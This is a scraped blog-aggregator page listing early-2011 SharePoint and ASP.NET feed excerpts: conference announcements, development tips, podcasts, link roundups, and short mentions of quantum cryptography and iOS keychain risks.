<div class="published">3 Mar 2011 | 6:20 am</div>
<div class="entry-content">
<div class="entry-bound">Disclaimer: I am the acting dean and founder of USPJ Academy. SharePoint Magazine, the publisher of this article, is owned by USPJA Publishing, a subsidiary of USPJ Academy. The purpose of this article is to clarify the benefits of employee training, of which USPJ Academy is a provider. As author of this article, I have made every attempt to remain neutral. In the previous columns, I...ve been discussing the economic sides of employee training. You...ve learned that training is massively expensive if seen as an isolated expense. However, when seen in conjunction with the soft benefits, such&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/SharepointMagazine/~3/plgGVrF8X8s/silverlight-in-sharepoint-overview" rel="bookmark" target="_blank">Silverlight in SharePoint: Overview</a></h3>

<div class="full-post">
<div class="author">Karine Bosch</div>
<div class="published">1 Mar 2011 | 12:50 pm</div>
<div class="entry-content">
<div class="entry-bound">In the beginning there was SharePoint, a platform for collaboration and content management. It allows people to work together. It&#8217;s an easy task to set up a site where people can share information and manage documents from start to finish. SharePoint 2007 was already good, but SharePoint 2010 is even better. New features such as taxonomy, document sets, content organizers, and better record management make it to an attractive platform. The user interface on the other side is not that attractive. But with a little bit of branding you can create a new look. And here enters Silverlight.</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/SharepointMagazine/~3/fAwZhBZ977o/sharepoint-magazine-print-edition" rel="bookmark" target="_blank">SharePoint Magazine Print Edition!</a></h3>

<div class="full-post">
<div class="author">bjornadmin</div>
<div class="published">3 Feb 2011 | 7:53 pm</div>
<div class="entry-content">
<div class="entry-bound">For many years, we&#8217;ve been able to get magazines from newsstands on virtually any IT topic, whether that is development, architecture, or creative content like Photoshop and Indesign. SharePoint, however, is absent from that lineup. We&#8217;re going to change that. We&#8217;re proud to announce to the community that we&#8217;re finally going to make SharePoint Magazine available in print as well. If this goes as planned, you will shortly be able to pick up a SharePoint Magazine from your local newsstand, just like many of the other IT professions have done for many years. You may be&hellip;</div>
</div>
</div>

</li>
</ul><ul id="feed26653" class="feed-block 812c49c35750c4d47d6730acbad8c4b2">        <li class="site">
<div class="add-feed"><img src="/images/added-my.gif" alt="added to my.Alltop" class="added-feed-my" style="display:none" /><a href="#" class="add-feed-my" title="add this feed to my.Alltop"><img src="/images/add-my.gif" alt="add this feed to my.Alltop" /></a></div>
<h2><a href="http://wss.made4the.net" target="_blank" class="snap_shots">Made 4 the Net</a></h2>
</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/Made4thenet/~3/tWNM1AW1ei4/mvp-summit-2011.aspx" rel="bookmark" target="_blank">MVP Summit 2011</a></h3>

<div class="full-post">
<div class="author">Jeremy Thake</div>
<div class="published">6 Mar 2011 | 5:46 am</div>
<div class="entry-content">
<div class="entry-bound">Last July I was honoured to be awarded the Microsoft MVP Award for SharePoint Server. I was invited to attend the MVP Summit 2011 in Seattle, WA last week. It was a whirlwind trip leaving on Saturday in Australia and arriving before I left due to 14 hour time zone difference! .. Sunday was a Paintball day with 30 other SharePoint MVPs sponsored by Microsoft which was awesome, albiet a little bit cold! Top work to Rob Foster and the Microsoft team for organising the day! .. Monday through Wednesday there were sessions with the Product Team to discuss futures of SharePoint along with taking&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/Made4thenet/~3/1RdqHr_303o/newyork.aspx" rel="bookmark" target="_blank">I'm moving to New York to work for AvePoint!</a></h3>

<div class="full-post">
<div class="author">Jeremy Thake</div>
<div class="published">25 Feb 2011 | 8:55 am</div>
<div class="entry-content">
<div class="entry-bound">I've been itching to announce this after signing my contract with AvePoint this week. I'm kicking of the e-3 visa process next week to migrate to Manhattern, New York in..April..to work for AvePoint at their HQ in Newport, New Jersey! Fingers crossed the visa process all goes smoothly. .. The next month is going to be crazy as I go to sell our car *sob* (beautiful 2005 Mazda RX8 if anyone is interested in Perth!), pack our place up, rent out our apartment and..find an apartment in Chelsea, Tribeca or Flatiron District! .. I'm so excited about the move, it's been something I've always wanted&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/Made4thenet/~3/xZkM--xSiCI/AvePointWebinar.aspx" rel="bookmark" target="_blank">AvePoint Webinar Series: Ask a SharePoint MVP!</a></h3>

<div class="full-post">
<div class="author">Jeremy Thake</div>
<div class="published">13 Feb 2011 | 9:26 pm</div>
<div class="entry-content">
<div class="entry-bound">I'm honoured to be asked to be part of AvePoint's new webinar series called &quot;Ask a SharePoint MVP&quot;. There are great sessions by fellow SharePoint..consultants Elaine Van Bergen (MAP and..also just came back from her MCM course in Seattle), Brian Farnhill (MVP) and also Rob Cheyne (vTSP). .. My session details are available below and I'll be covering off some of the news things I've been writing about over at NothingButSharePoint.com. .. Ask Jeremy Thake (MVP) -Smart SharePoint Release Management 23rd February 2011 (Wednesday)12.30pm-1.30pm (Canberra, Melbourne, Sydney time) Jeremy&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/Made4thenet/~3/jmQR7Z2lW3o/live-online-sharepoint-conference-spsemea.aspx" rel="bookmark" target="_blank">Live Online SharePoint Conference - SPSEMEA</a></h3>

<div class="full-post">
<div class="author">Jeremy Thake</div>
<div class="published">17 Jan 2011 | 7:21 pm</div>
<div class="entry-content">
<div class="entry-bound">&quot;SharePoint Saturday EMEA is a loosely knit group of SharePoint evangelists from around the world. We are working together, using SharePoint as a collaboration tool to sponsor live, online global events. On January 22nd, 2011, we will hold our 2nd annual, live online SharePoint Saturday event in the EMEA Timezone.&quot; .. I'll be presenting at this, actually got the first session in track 1 straight after keynote due to the timezone I'm in (GMT+8) at the moment. The other reason being is, I'm actually travelling down south into the country Friday night to a friends cottage in Gracetown.</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/Made4thenet/~3/QInV8eLwTCo/dosAndDonts.aspx" rel="bookmark" target="_blank">Do's and Don'ts of SharePoint Development</a></h3>

<div class="full-post">
<div class="author">Jeremy Thake</div>
<div class="published">16 Dec 2010 | 2:05 pm</div>
<div class="entry-content">
<div class="entry-bound">Presented at lunch on this. The slide deck is available here:http://www.sharepointusers.org.au/Perth/User%20Group%20Presentations/Usergroup%20Meetings/DosAndDontsforSharePointDevelopers.pptx Please don't forget to leave your feedback on my presentation here if you attended:http://speakerrate.com/talks/5234-perth-sharepoint-user-group And please take 2 seconds to vote for me on iiNET TOP Geek awards :-)http://bit.ly/voteJthake</div>
</div>
</div>

</li>
</ul><div class="row-clear">&nbsp;</div>
<ul id="feed26659" class="feed-block fd7fda882987836eafb1c8c067484e0f">        <li class="site">
<div class="add-feed"><img src="/images/added-my.gif" alt="added to my.Alltop" class="added-feed-my" style="display:none" /><a href="#" class="add-feed-my" title="add this feed to my.Alltop"><img src="/images/add-my.gif" alt="add this feed to my.Alltop" /></a></div>
<h2><a href="http://www.wictorwilen.se/" target="_blank" class="snap_shots">Wictor Wilen</a></h2>
</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/WictorWilen/~3/mBLqHXn84HU/Calling-a-WCF-Service-using-jQuery-in-SharePoint-the-correct-way.aspx" rel="bookmark" target="_blank">Calling a WCF Service using jQuery in SharePoint - the correct way</a></h3>

<div class="full-post">
<div class="author">Wictor Wil..n</div>
<div class="published">22 Feb 2011 | 3:12 am</div>
<div class="entry-content">
<div class="entry-bound">Today an article was published on the SharePoint Developer Team Blog called Calling a WCF Service using jQuery. The content and purpose of the article is good and interesting but the way it is implemented can not be considered best practice and is definitely not the way we (I) teach SharePoint 2010 development. For instance this article manually registers assemblies in the Global Assembly Cache! Something that we never should do! It tells you to copy files to the virtual directory bin folder and into the Layouts folder! Ouch! Also, the article contains some plain ol' errors. Since the content&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/WictorWilen/~3/MWZd5hTti5M/About-the-Customer-Experience-Improvement-Program-in-SharePoint-2010.aspx" rel="bookmark" target="_blank">About the Customer Experience Improvement Program in SharePoint 2010</a></h3>

<div class="full-post">
<div class="author">Wictor Wil..n</div>
<div class="published">5 Feb 2011 | 9:49 pm</div>
<div class="entry-content">
<div class="entry-bound">The other day I was setting up another SharePoint 2010 farm and got the usual question to participate in the Customer Experience Improvement Program (CEIP). As always I bailed out of this. Why? Sending information to a third party about my SharePoint farm doesn't appeal me, even if it's Microsoft. You know, they might check how I configure my farm, how I use it etc., and then sit back and laugh at me. Not really, but I think most of us prefer not to send that information to Microsoft. But, this is not my normal standing to the CEIP. I use to participate in it, like when I install new software&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/WictorWilen/~3/CwP-fFJYdhk/Working-with-URLs-in-SharePoint-2010-JavaScripts.aspx" rel="bookmark" target="_blank">Working with URLs in SharePoint 2010 JavaScripts</a></h3>

<div class="full-post">
<div class="author">Wictor Wil..n</div>
<div class="published">2 Feb 2011 | 3:17 pm</div>
<div class="entry-content">
<div class="entry-bound">The SharePoint 2010 user interface relies heavily on JavaScripts, just take a look at the Ribbon which is completely generated by a bunch of JavaScripts. Often customizations of SharePoint also involve JavaScripts. You need it to open modal dialogs, add notifications, create Ribbon Page Components etc. etc.. JavaScript is just one of the programming languages you must know as a SharePoint developer - and you can do amazing stuff with it (just take a look at SPServices by Marc D Anderson). In SharePoint 2010 the SharePoint product team (finally) spent some time making a nice and decent&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/WictorWilen/~3/SKwXqgQAwx4/SharePoint-2010-Ribbon-Controls-Part-8-The-Spinner-Control.aspx" rel="bookmark" target="_blank">SharePoint 2010 Ribbon Controls - Part 8 - The Spinner Control</a></h3>

<div class="full-post">
<div class="author">Wictor Wil..n</div>
<div class="published">1 Feb 2011 | 2:11 am</div>
<div class="entry-content">
<div class="entry-bound">Back again (sorry about the delay) with a new part in the SharePoint 2010 Ribbon Controls series (all parts available here). This time I'm going to show you an interesting control - the Spinner control. What is a Spinner control? The spinner is an up/down (increase/decrease) control with some smart abilities to handle different units. For instance it is used when setting image and table sizes in the default ribbon. The Spinner control has a value (number) and a unit (pixel, percent, points etc.) and three ways to modify the value; manual or using the up and down buttons. Sample Spinner&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/WictorWilen/~3/S1X0cL5jcNQ/Summary-page-of-my-recommended-links-and-tools-for-SharePoint-2010-classes.aspx" rel="bookmark" target="_blank">Summary page of my recommended links and tools for SharePoint 2010 classes</a></h3>

<div class="full-post">
<div class="author">Wictor Wil..n</div>
<div class="published">20 Jan 2011 | 3:07 am</div>
<div class="entry-content">
<div class="entry-bound">I've just published a page, which I plan to update regularly, containing links to web sites, tools, products, solutions, articles, posts, books etc. which I recommend and talk about during my SharePoint 2010 classes. You can find the page here: Class Links If I did promise you during my classes to add a link to it and have forgotten - drop me an e-mail and remind me.</div>
</div>
</div>

</li>
</ul><ul id="feed26672" class="feed-block 3c23f6f18d8c2f37c7bc8943f8b46bd8">        <li class="site">
<div class="add-feed"><img src="/images/added-my.gif" alt="added to my.Alltop" class="added-feed-my" style="display:none" /><a href="#" class="add-feed-my" title="add this feed to my.Alltop"><img src="/images/add-my.gif" alt="add this feed to my.Alltop" /></a></div>
<h2><a href="http://blog.markharrison.co.uk/" target="_blank" class="snap_shots">Mark Harrison</a></h2>
</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://blog.markharrison.co.uk/post/Quantum-cryptography-key-exchange.aspx" rel="bookmark" target="_blank">Quantum cryptography - key exchange</a></h3>

<div class="full-post">
<div class="author"></div>
<div class="published">2 Mar 2011 | 1:51 pm</div>
<div class="entry-content">
<div class="entry-bound">[youtube:3DGlEvC78iE] Quantum mechanics provides methods of encryption that are secure from eavesdropping attacks against the quantum channel. &nbsp;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://blog.markharrison.co.uk/post/Avviso-SharePoint.aspx" rel="bookmark" target="_blank">Avviso SharePoint</a></h3>

<div class="full-post">
<div class="author"></div>
<div class="published">21 Feb 2011 | 12:28 pm</div>
<div class="entry-content">
<div class="entry-bound">[youtube:NFRWHAUky8w] Avviso is a content management framework for SharePoint 2010. This video shows the improved page editing and publishing model.</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://blog.markharrison.co.uk/post/Lost-iPhone-lost-passwords.aspx" rel="bookmark" target="_blank">Lost iPhone - lost passwords</a></h3>

<div class="full-post">
<div class="author"></div>
<div class="published">16 Feb 2011 | 3:44 pm</div>
<div class="entry-content">
<div class="entry-bound">The paper /video highlights risks that accompany losing a locked iOS device regarding con...dentiality of passwords stored in the keychain. It presents results of hands-on tests that show the possibility for attackers to reveal some of the keychain entries. For the described approach, the knowledge of the user's secret passcode is not needed, as the protection provided by the passcode is bypassed. [youtube:uVGiNAs-QbY] Lost iPhone, Lost Passwords!&nbsp;(PDF)</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://blog.markharrison.co.uk/post/PushBI-Mobile-Business-Intelligence-for-Windows-Phone-7.aspx" rel="bookmark" target="_blank">PushBI - Mobile Business Intelligence for Windows Phone 7</a></h3>

<div class="full-post">
<div class="author"></div>
<div class="published">10 Feb 2011 | 10:40 am</div>
<div class="entry-content">
<div class="entry-bound">[youtube:saF1Sey2eJ0] PushBI delivers the power to help drive business insights to everyone and help them make better decisions that improve you organization's performance. Supports SharePoint http://www.pushbi.com/</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://blog.markharrison.co.uk/post/Internet-Explorer-9-RC-download.aspx" rel="bookmark" target="_blank">Internet Explorer 9 RC download</a></h3>

<div class="full-post">
<div class="author"></div>
<div class="published">10 Feb 2011 | 9:55 am</div>
<div class="entry-content">
<div class="entry-bound">IE9 RC download ... Win 7 32-bit Win 7 64-bit</div>
</div>
</div>

</li>
</ul><ul id="feed28019" class="feed-block 0715221b8eb9403e8875f76da3146bbc">        <li class="site">
<div class="add-feed"><img src="/images/added-my.gif" alt="added to my.Alltop" class="added-feed-my" style="display:none" /><a href="#" class="add-feed-my" title="add this feed to my.Alltop"><img src="/images/add-my.gif" alt="add this feed to my.Alltop" /></a></div>
<h2><a href="http://weblogs.asp.net/gunnarpeipman/default.aspx" target="_blank" class="snap_shots">Gunnar Peipman's ASP.NET blog</a></h2>
</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/gunnarpeipman/~3/gZUUn5LgpGM/asp-net-building-tree-picker-dialog-using-jquery-ui-and-treeview-control.aspx" rel="bookmark" target="_blank">ASP.NET: Building tree picker dialog using jQuery UI and TreeView control</a></h3>

<div class="full-post">
<div class="author">DigiMortal</div>
<div class="published">5 Mar 2011 | 1:28 am</div>
<div class="entry-content">
<div class="entry-bound">Selecting things from dialogs and data represented as trees are very common things we see in business applications. In this posting I will show you how to use ASP.NET TreeView control and jQuery UI dialog component to build picker dialog that hosts tree data. Source code You can find working example with source code from my examples repository in GitHub. Please feel free to give me feedback about my examples. Source code repository GitHub Building dialog box As I don...t like to invent wheels then I will use jQuery UI to solve the question related to dialogs. If you are not sure how to&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/gunnarpeipman/~3/ALNyI3lSoDw/5-minutes-wif-make-your-asp-net-application-use-test-sts.aspx" rel="bookmark" target="_blank">5 minutes WIF: Make your ASP.NET application use test-STS</a></h3>

<div class="full-post">
<div class="author">DigiMortal</div>
<div class="published">17 Feb 2011 | 9:57 am</div>
<div class="entry-content">
<div class="entry-bound">Windows Identity Foundation (WIF) provides us with simple and dummy STS application we can use to develop our system with no actual STS in place. In this posting I will show you how to add STS support to your existing application and how to generate dummy application that plays you real STS. Word of caution! Although it is relatively easy to build your own STS using WIF tools I don...t recommend you to build it. Identity providers must be highly secure and stable in every means and this makes development of your own STS very complex task. If it is possible then use some known STS solution. I&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/gunnarpeipman/~3/obvrc_cuJe8/making-wif-local-sts-to-work-with-your-asp-net-application.aspx" rel="bookmark" target="_blank">Making WIF local STS to work with your ASP.NET application</a></h3>

<div class="full-post">
<div class="author">DigiMortal</div>
<div class="published">17 Feb 2011 | 6:22 am</div>
<div class="entry-content">
<div class="entry-bound">Making Windows Identity Foundation (WIF) STS test application work with your solution is not as straightforward process as you can read from books and articles. There are some tricks and some configuration modifications you must do to get things work. Fortunately these steps are simple one. 1. Move your application to IIS or IIS Express If your application uses development web server that ships with Visual Studio then make your application use IIS or IIS Express. You get simple support for IIS Express to Visual Studio 2010 after installing Visual Studio 2010 SP1. You can read more from my&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/gunnarpeipman/~3/tOP4TvLyaJw/blogging-locally-and-globally-my-experience.aspx" rel="bookmark" target="_blank">Blogging locally and globally...my experience</a></h3>

<div class="full-post">
<div class="author">DigiMortal</div>
<div class="published">13 Feb 2011 | 3:33 am</div>
<div class="entry-content">
<div class="entry-bound">In Baltic MVP Summit 2011 there was discussion about having two blogs - one for local and another for global audience ... and how to publish once written information in these blogs. There are many ways how to optimize your blogging activities if you have more than one audience and here you can find my experiences, best practices and advices about this topic. My two blogs I have to working blogs: this one here technology and programming blog for local market My local blog is almost five years old and it makes it one of the oldest company blogs in Estonia. It is still active and I write there&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/gunnarpeipman/~3/547AFFkoPH8/book-review-peopleware-productive-projects-and-teams.aspx" rel="bookmark" target="_blank">Book review: Peopleware: Productive Projects and Teams</a></h3>

<div class="full-post">
<div class="author">DigiMortal</div>
<div class="published">31 Jan 2011 | 1:40 pm</div>
<div class="entry-content">
<div class="entry-bound">&#160;&#160; Peopleware by Tom DeMarco and Timothy Lister is golden classic book that can be considered as mandatory reading for software project managers, team leads, higher level management and board members of software companies. If you make decisions about people then you cannot miss this book. If you are already good on managing developers then this book can make you even better ... you will learn new stuff about successful development teams for sure. Why peopleware? Peopleware gives you very good hints about how to build up working environment for project teams where people can really&hellip;</div>
</div>
</div>

</li>
</ul><div class="row-clear">&nbsp;</div>
<ul id="feed37567" class="feed-block 0f90e65e8c989e109716ff96171db11e">        <li class="site">
<div class="add-feed"><img src="/images/added-my.gif" alt="added to my.Alltop" class="added-feed-my" style="display:none" /><a href="#" class="add-feed-my" title="add this feed to my.Alltop"><img src="/images/add-my.gif" alt="add this feed to my.Alltop" /></a></div>
<h2><a href="http://sharepointcommunity.de/blogs/mgreth/default.aspx" target="_blank" class="snap_shots">Michael Greth MVP SharePoint Blog</a></h2>
</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/MichaelGreth/~3/q3z5lJhR4d0/sppd161-sharepointpodcast.aspx" rel="bookmark" target="_blank">SPPD161 SharePointPodcast</a></h3>

<div class="full-post">
<div class="author">Michael Greth</div>
<div class="published">7 Mar 2011 | 3:28 am</div>
<div class="entry-content">
<div class="entry-bound">Direkter Download: SPPD-161-2011-03-07 (Please visit the site to view this media) Fanseite auf FaceBook CeBIT 2011 Interview mit Claudia Eichler-Liebenow. T-Systems MMS, @ceitwitt SocialSoftwareMatrix.org 30 Tage Testsite Blog Besser20 Denken mit PowerPoint SWR2 AULA Wie die Powerpointpr&auml;sentation die Vortragskultur ver&auml;ndert hat, Burkhard Spinnen &nbsp; Technorati: SharePoint, Podcast, SharePoint 2007, SharePointcommunity, MOSS 2007, SharePoint 2010, Michael Greth, Office 2010 &nbsp;Feedback: sharepointpodcast (at) gmail.com &nbsp;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/MichaelGreth/~3/BcfSRqcC6QY/sharepoint-kaffeetasse-225.aspx" rel="bookmark" target="_blank">SharePoint Kaffeetasse 225</a></h3>

<div class="full-post">
<div class="author">Michael Greth</div>
<div class="published">7 Mar 2011 | 1:06 am</div>
<div class="entry-content">
<div class="entry-bound">SharePoint Dokumentation Microsoft SharePoint Foundation 2010 Technical Library in Compiled Help format Microsoft SharePoint Server 2010 Technical Library in Compiled Help format SharePoint 2010 SDK Resource Center - NEW! SharePoint 2010 Reference: Software Development Kit Branding/Theming SharePoint 2010-Theming Teil 1 ... Einf..hrung SharePoint 2010-Theming Teil 2 ... Die Theme Engine Dies und Das &quot;Dont Make SharePoint Look Like SharePoint&quot;- Ouch The Group Work Site in SharePoint 2010 - &quot;strange, inconsistent, weird, and unusable&quot; SharePoint 2010: InfoPath Form Web Part&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/MichaelGreth/~3/FagIHbeNynM/sharepoint-2010-cumulative-updates-februar-2011-erschienen.aspx" rel="bookmark" target="_blank">SharePoint 2010 Cumulative Updates Februar 2011 erschienen</a></h3>

<div class="full-post">
<div class="author">Michael Greth</div>
<div class="published">5 Mar 2011 | 6:07 am</div>
<div class="entry-content">
<div class="entry-bound">Nachdem vor zwei Wochen die SharePoint Cumulative Updates Februar 2011 f&uuml;r WSS 3.0 und MOSS2007 online gestellt wurden, folgen heute die Updates f&uuml;r SharePoint Foundation 2010 und SharePoint Server 2010: Download SharePoint Foundation 2010 February 2011 CU Download SharePoint Server 2010 February 2011 CU Download SharePoint Server 2010 with Project Server February 2011 CU Ausf&uuml;hrliche Informationen mit Links zu den KB Artikeln im Blog von Stefan Go&szlig;ner. Technorati: SharePoint, Podcast, SharePointCommunity,MOSS, SharePoint 2010, Michael Greth, Office 2010, SharePoint&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/MichaelGreth/~3/3CbSKOJn4RM/sppd160-sharepointpodcast.aspx" rel="bookmark" target="_blank">SPPD160 SharePointPodcast</a></h3>

<div class="full-post">
<div class="author">Michael Greth</div>
<div class="published">3 Mar 2011 | 8:56 am</div>
<div class="entry-content">
<div class="entry-bound">Direkter Download: SPPD-160-2011-03-03 (Please visit the site to view this media) Fanseite auf FaceBook CeBIT 2011 Interview mit Andreas Hepfner von Vialutions Mein pers&ouml;nliches Messesummary Seit 7 Jahren SharePointPodcast auf der CeBIT Technorati: SharePoint, Podcast, SharePoint 2007, SharePointcommunity, MOSS 2007, SharePoint 2010, Michael Greth, Office 2010 &nbsp;Feedback: sharepointpodcast (at) gmail.com &nbsp;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/MichaelGreth/~3/m-LdHiesDME/sharepoint-toolbox-23.aspx" rel="bookmark" target="_blank">SharePoint ToolBox 23</a></h3>

<div class="full-post">
<div class="author">Michael Greth</div>
<div class="published">3 Mar 2011 | 4:30 am</div>
<div class="entry-content">
<div class="entry-bound">Diesmal gibt es 4 Projekte auf CodePlex, die neu sind bzw. mit aktualisierten Versionen aufwarten: SilverPart 2.2 This project includes a Silverlight wrapper Web Part that can be used in MOSS 2007 or WSS 3.0 to expose Silverlight (1,2,und3) content. The goal of this project is to create a generic web part that has custom properties that provide flexibility for embedding different Silverlight solutions into SharePoint sites SharePoint Designer Workflow String Actions SharePoint WSP that adds a bunch of string actions to SharePoint Designer workflows- includes SubString, FormatDate, IndexOf,&hellip;</div>
</div>
</div>

</li>
</ul><ul id="feed44422" class="feed-block 7bbdd60ec668eb574862b551d82c8191">        <li class="site">
<div class="add-feed"><img src="/images/added-my.gif" alt="added to my.Alltop" class="added-feed-my" style="display:none" /><a href="#" class="add-feed-my" title="add this feed to my.Alltop"><img src="/images/add-my.gif" alt="add this feed to my.Alltop" /></a></div>
<h2><a href="http://community.zevenseas.com/Blogs/Daniel/Lists/Posts/AllPosts.aspx" target="_blank" class="snap_shots">Daniel | zevenseas | SharePoint Blog: Posts</a></h2>
</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feeds.zevenseas.com/~r/blogs_daniel/~3/zvUWYXnFbWE/ViewPost.aspx" rel="bookmark" target="_blank">SharePoint Australia Conference: I will be there!</a></h3>

<div class="full-post">
<div class="author"></div>
<div class="published">24 Feb 2011 | 12:19 am</div>
<div class="entry-content">
<div class="entry-bound">Body: I...m pleased to announce that I will be speaking at the SharePoint Australia conference this year. I had a great time last year, though it did feel a little weird to be presenting without an accent after 9 years in Europe! My session details are as follows: Social Computing Meets the Enterprise This session will review some of the leading Social Networking sites online, and then compare and contrast them with the functionality provided in SharePoint 2010. We...ll discuss what...s important, what...s missing, why it...s missing, and how you can bridge those gaps. From there we...ll&hellip;</div>
</div>
</div>

</li>
</ul><ul id="feed67543" class="feed-block 981ad4dbd26dd4a4e3e3076cb0e0666e">        <li class="site">
<div class="add-feed"><img src="/images/added-my.gif" alt="added to my.Alltop" class="added-feed-my" style="display:none" /><a href="#" class="add-feed-my" title="add this feed to my.Alltop"><img src="/images/add-my.gif" alt="add this feed to my.Alltop" /></a></div>
<h2><a href="http://sharepointpmp.com" target="_blank" class="snap_shots">SharePoint PMP</a></h2>
</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/SharepointPmp/~3/9079Jt7dOa8/sharepointpmp" rel="bookmark" target="_blank">Links for 2011-03-03 [del.icio.us]</a></h3>

<div class="full-post">
<div class="published">4 Mar 2011 | 12:00 am</div>
<div class="entry-content">
<div class="entry-bound">A Collection of 50+ Enterprise 2.0 Case Studies and Examples</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/SharepointPmp/~3/jOj46mGd-GE/sharepointpmp" rel="bookmark" target="_blank">Links for 2011-02-16 [del.icio.us]</a></h3>

<div class="full-post">
<div class="published">17 Feb 2011 | 12:00 am</div>
<div class="entry-content">
<div class="entry-bound">Customizing My Sites in Microsoft SharePoint 2010 - Microsoft ... Blog - SharePoint 2010: Activating My Sites</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/SharepointPmp/~3/Ek79UiKZSy0/" rel="bookmark" target="_blank">It...s Deja Vu All Over Again...</a></h3>

<div class="full-post">
<div class="author">Rich Blank</div>
<div class="published">28 Jan 2011 | 6:12 am</div>
<div class="entry-content">
<div class="entry-bound">For those who&#8217;ve have been around the world of technology the last 2 decades, there are times SharePoint seems like d..j.. vu all over again..... The other day, I came across a Fortune article entitled &#8220;Why Microsoft Can&#8217;t Stop Lotus Notes&#8221; from 1994 discussing the hype of Lotus Notes with millions of licenses and the [...]</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/SharepointPmp/~3/HwbLsE56cHE/" rel="bookmark" target="_blank">Using the CMM to Benchmark Your SharePoint Investment?</a></h3>

<div class="full-post">
<div class="author">Rich Blank</div>
<div class="published">19 Jan 2011 | 4:54 pm</div>
<div class="entry-content">
<div class="entry-bound">How do you know if or when you truly are optimizing the investment you&#8217;ve made in the Microsoft SharePoint platform? ..You&#8217;ve spent last year creating your SharePoint roadmaps and have grand plans for social capabilities or perhaps the cloud. ..Or maybe ..you know enough about SharePoint to be dangerous and are just getting started with [...]</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/SharepointPmp/~3/aMPrasBkaGg/" rel="bookmark" target="_blank">Share Your Journey...</a></h3>

<div class="full-post">
<div class="author">Rich Blank</div>
<div class="published">13 Jan 2011 | 11:11 pm</div>
<div class="entry-content">
<div class="entry-bound">Changing the way people work, share information, manage knowledge, and communicate with each other is very much a challenge of organizational cultural. Let&#8217;s face it &#8212; implementing technology like SharePoint is a journey. Most of us IT or business professionals who have led or are currently leading their organization&#8217;s &#8220;social and collaborative&#8221; transformation leveraging the [...]</div>
</div>
</div>

</li>
</ul><div class="row-clear">&nbsp;</div>
<ul id="feed71594" class="feed-block fd7fda882987836eafb1c8c067484e0f">        <li class="site">
<div class="add-feed"><img src="/images/added-my.gif" alt="added to my.Alltop" class="added-feed-my" style="display:none" /><a href="#" class="add-feed-my" title="add this feed to my.Alltop"><img src="/images/add-my.gif" alt="add this feed to my.Alltop" /></a></div>
<h2><a href="http://www.wictorwilen.se/" target="_blank" class="snap_shots">Wictor Wil..n</a></h2>
</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/WictorWilen/~3/mBLqHXn84HU/Calling-a-WCF-Service-using-jQuery-in-SharePoint-the-correct-way.aspx" rel="bookmark" target="_blank">Calling a WCF Service using jQuery in SharePoint - the correct way</a></h3>

<div class="full-post">
<div class="author">Wictor Wil..n</div>
<div class="published">22 Feb 2011 | 3:12 am</div>
<div class="entry-content">
<div class="entry-bound">Today an article was published on the SharePoint Developer Team Blog called Calling a WCF Service using jQuery. The content and purpose of the article is good and interesting but the way it is implemented can not be considered best practice and is definitely not the way we (I) teach SharePoint 2010 development. For instance this article manually registers assemblies in the Global Assembly Cache! Something that we never should do! It tells you to copy files to the virtual directory bin folder and into the Layouts folder! Ouch! Also, the article contains some plain ol' errors. Since the content&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/WictorWilen/~3/MWZd5hTti5M/About-the-Customer-Experience-Improvement-Program-in-SharePoint-2010.aspx" rel="bookmark" target="_blank">About the Customer Experience Improvement Program in SharePoint 2010</a></h3>

<div class="full-post">
